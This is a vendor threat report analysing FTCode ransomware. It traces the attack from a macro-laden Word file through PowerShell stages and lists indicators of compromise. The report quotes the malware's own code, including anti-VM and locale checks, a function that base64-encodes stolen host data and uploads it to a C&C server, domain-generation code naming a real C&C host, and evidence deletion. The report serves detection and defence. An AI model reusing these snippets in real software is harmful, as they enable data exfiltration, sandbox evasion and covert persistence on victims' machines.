Get Started

In this article

THREAT REPORT – FTCODE


August 10, 2020
Last Updated: January 15, 2024
Share on:

Written by: Ben Gold & Itamar Medyoni

Cynet has detected a malicious PowerShell command. After analyzing the command, we have concluded that this command is associated with a known ransomware named FTCode.

FTCode is the name of a data locker ransomware that appends the extension “.FTCODE” to encrypted files. Once executed on a computer system, FTCode performs many malicious operations by creating and executing harmful files that aim at facilitating the ransomware attack.

The main purpose of this threat is to extort a ransom fee from its victims. The initiating file of this attack comes as a .doc file. This is a popular way for malicious spam to deliver Office-Macro related malware through phishing campaigns. The payload of the ransomware will usually be downloaded as a result of running the .doc file’s malicious macros.

pic1

CYNET DETECTION AND PREVENTION

Cynet 360 is protecting your assets against this type of exploit. This type of attack was detected by Cynet’s Advanced Detection Mechanism. The alert that was triggered was the PowerShell Malicious Command Alert:
2

Stop advanced cyber
threats with one solution

Cynet’s All-In-One Security Platform

  • Full-Featured EDR and NGAV
  • Anti-Ransomware & Threat Hunting
  • 24/7 Managed Detection and Response

Achieved 100% detection in 2023

review stars

Rated 4.8/5

review stars

2024 Leader

Investigation overview

  1. First Stage: Initiation of the attack

The first stage of the attack starts with a malicious Word file.

The file requests the user to press the “Enable Macros” button, apparently to show the “real” document.

Pressing this button will be the initiation of the attack, as it will launch the malicious macros hidden in this file.

3

After the Macros have been launched, the next stage consists of “winword.exe” launching PowerShell with the following command line:

4

This downloaded string will initiate the second stage of the attack.

The backdoor will usually be downloaded like this:

C:\Users\Public\Libraries\WindowsIndexingService.vbs or
C:\Users\Public\Libraries\WindowsIndexingService.js

  1. Second Stage: Malware Prerequisites and Settings Variables

5

if(((Get-UICulture).Name -match “CN|RO|RU|UA|BY”) -or ((Get-WmiObject -class Win32_ComputerSystem -Property Model).Model -match “VirtualBox|VMware|KVM”)){ exit;};

The command first checks what is the geographic location of the machine and if it is running through a Virtual Machine. If the infected host has localization setting of China, Romania, Russia, Ukraine or Belarus and/or if it is running from Virtual Machine, the command will terminate itself (“{ exit;};).

Figure 1 – the command that the malware uses to get the computer location:

6

Figure 2 – the command that the malware uses to get the computer name:

7

The rest of the command sets variables and paths for the rest of the code.

  1. Third Stage: Create Temp File

8

function iamwork{ sc -Path $wxgucjuxtb -Value ( $pid, [string](Get-Date), $vhgbtbsat, $myurlpost, $uvgvcdeez -join ‘,’ ); };

This function is used to collect the following content and write it to a new file: “X0FX921.1.tmp“:

  • $pid – the PID of the PowerShell process that executed the code.
  • [string](Get-Date) – the current date and time.
  • $vhgbtbsat – 921.1
  • $myurlpost = $false.
  • $jvxhiwv = will eventually finds out as the SSID of the machine.

Figure 3 – the command that the malware uses in order to check the PowerShell PID and the current date:

9

  1. Forth Stage: Check Memory Usage
function jvyexyhg( $fwjacxg ){if( $fwjacxg -match ‘OutOfMemoryException’ ){ri -Path $wxgucjuxtb -Force;get-process powershell* | stop-process;exit;

If the variable “$fwjacxg” matches the ‘OutOfMemoryException’ (An exception that is thrown when there is not enough memory to continue the execution of a program), it performs the following actions:

  • Delete the “X0FX921.1.tmp” file. (to delete evidence)
  • Stop the “PowerShell” process that executed the code.
  • Perform exit.
  1. Fifth Stage: Creating and Sending a Network Packet with Stolen Information

10This function is used to build a network packet that will be sent back to the attacker in order to send stolen information of the victim.

11

$vjtuewhxb = $ythggziy.UploadString( $myurlpost, “l=”+[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( ( “v=$vhgbtbsat&guid=$ajztdich&” + $fwjacxg ) ) ) );$vjtuewhxb = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( $vjtuewhxb ) );if( !$zxczcibut ){ return $false; }if( $uvgvcdeez -eq $vjtuewhxb.Substring(0,16) ){return $vjtuewhxb.Substring(16,$vjtuewhxb.length-16) ;}else{$zxczcibut = $false;sendpost (“error=” + [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( $vjtuewhxb ) ) );

This is the “try” action: the attacker is uploading the stolen information back to the C&C server, using “UploadString”. It converts the data to Base64, sends the data, and then converts back from Base64.
If there is an error, the data is converted back to Base64 with an error message.

12

$jbzfdxwa = “http://home[.]mmaut.com/”;

“dfb”,”93a”,”25c”,”8f9″,”gh7″ | %{ $jbzfdxwa += “,”+”http://”+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat “%y%m%V”) ) ).toLower() ) +”.top/”; };

This function is used to generate five different auto-generated domains based on the time of machine converted to base64 and ends with “. top”, all split by “,”. In addition, there is one static domain which is included in the domain lists (home[.]mmaut.com).

Figure 4 – the command that the malware uses to generate the domains using the machine time converted by base64: Then, the command uses the function “sendpost” in order to send the network packet with the stolen information to the six domains which reaches the malicious actors.

13

  1. Sixth Stage: Kill Switch and configuring the “thumbcache_33.db”

14The malware checks if the file “X0FX921.1.tmp” was created more than 15 minutes ago, if yes –

  • Delete the “X0FX921.1.tmp” file. (to delete evidence)
  • Stop the “PowerShell” process that executed the code.
  • Or perform exit.

$bivtvfg = “os=”+[string]$PSVersionTable.BuildVersion+”&psver=”+( (Get-Host).Version ).Major;

This command is set the PowerShell Build Version and the PowerShell Major Version as the $bivtvfg variable.
This is evidence to more information that the attacker steals and uses.

Figure 5 – the commands that the malware uses to check the PowerShell Build and Major Versions:

16

The rest of the command is checking that the file “thumbcache_33.db” is configured properly, if not it –

  • Deletes the files “X0FX921.1.tmp” and “thumbcache_33.db”. (in order to delete evidence)
  • Stops the “PowerShell” process that executed the code.
  • Perform exit command.

17

$uvgvcdeez = ( [guid]::NewGuid() -replace ‘-‘,” ).Substring(0,16);

sc -Path $cvsuevuz -Value ( ( (Get-WmiObject -class Win32_ComputerSystem -Property Name).Name.trim() + “_” + [guid]::NewGuid().toString().replace(‘-‘, ”).Substring(0,20) ), $uvgvcdeez  -join ‘,’ );

These commands are set new variables and insert them into the file “thumbcache_33.db”.
The file contains the computer name, the first 16 digits of the GUID without hyphens (“-“), and the SSID of the computer.

Figure 6 – the command that the malware uses to get the computer name and the GUID first 16 digits 18

  1. Seventh Stage: Persistency

19These commands silently delete the scheduled tasks “WindowsIndexingService” and “Windows Indexing Service”, if existed. Thereafter, it creates a task named “WindowsIndexingService”, that will execute the JavaScript file: “\Libraries\WindowsIndexingService.js” using “wscript.exe”. The execution is set to run silently daily, at 00:00. The task will repeat itself every 20 minutes, and for a duration of 23 hours and 59 minutes.

This is how the malware gains persistency on the infected host and disguises itself as an “innocent” task so the user or other AV mechanisms would not notice.

20The above commands create a “WindowsIndexingService.lnk” shortcut file in the Startup directory. This is another way to gain persistency on the infected host. It first checks if the file already exists in the startup directory, and if not:

  • It opens a new windows shell to run commands.
  • It uses the new shell to create the shortcut file “WindowsIndexingService.lnk” in the Startup folder.
  • Attaching the shortcut file to the JavaScript file “WindowsIndexingService.js” using “wscript.exe”, silently.
  • It sets the file description as: “Windows Indexing Service”, in order to disguise itself.
  1. Eighth Stage: Final Communication to the C&C Server

21

The command sets the variable $myurlpost, which unified in one variable the following information:

  1. The auto-generated domains;
  2. The PowerShell versions; and
  3. The first digits of the GUID, without “-“.

It checks if the variable $zxczcibut exists, if yes – it aborts (as this variable is set to “false”). The abortion is made through the check of the length of the variable. If the length is less than 30 (always true) – it aborts the command. Otherwise, it uses “sendpost” function with the new $myurlpost variable that contains all the stolen information.

The code ends by a sleep command for 3 minutes and then deletes the “X0FX921.1.tmp” file.

The Dumped files

  1. C:\Users\cynet\AppData\Local\Temp\X0FX921.tmp:

22Contains:

  • The PID of the PowerShell process that executed the code.
  • The current date and time.
  • 1 – Value of variable that probably used by the attacker to verify the variant.
  • False – A value of variable that probably indicates the attacker if the variables were set.
  • The SSID of the computer.
  1. C:\Users\Public\Libraries\thumbcache_33.db:

23Contains:

  • The computer name.
  • The first 16 digits of the GUID (without “-“).
  • The SSID of the computer.
  1. C:\Users\Public\Libraries\js:

24The above JavaScript file is the file executed by the Task Scheduler. This file is highly obfuscated, as seen below:

After one stage of decoding:

25

After decoding the Base64:

26We get the same code as the PowerShell command, which means that the malware re-executing itself to gain persistency and keeps sending the stolen information to the attacker.

RECOMMENDATIONS

  • Delete all malicious files indicated above (especially all JavaScript and/or VBS files that used by the malware to reach persistence).
  • Block traffic to malicious Domain\IP.

INDICATORS OF COMPROMISE

Type Indicator
SHA-256 4ff0ce39dd3675e0c51ff6680c8e8d92e6660d26a7898bc9ddfff34f3ba8508f
fe6e31e4261e584ad81c0375380ffbb134001941fb314274025aabdc7277e28a
0e23d09135be32cdb64f4be28c4aaede89836d8c8f2d863b870c63001e7d3a49
Domains hxxp://home.mmaut.com/
hxxp://zgzimtkxmjux.top/
hxxp://otnhmtkxmjux.top/
hxxp://mjvjmtkxmjux.top/
hxxp://ogy5mtkxmjux.top/
hxxp://z2g3mtkxmjux.top/
Payload locations C:\Users\cynet\AppData\Local\Temp\X0FX921.tmp
C:\Users\Public\Libraries\thumbcache_33.db:
C:\Users\Public\Libraries\WindowsIndexingService.js

 

Let’s get started!

Ready to extend visibility, threat detection and response?

Get a Demo

Search results for: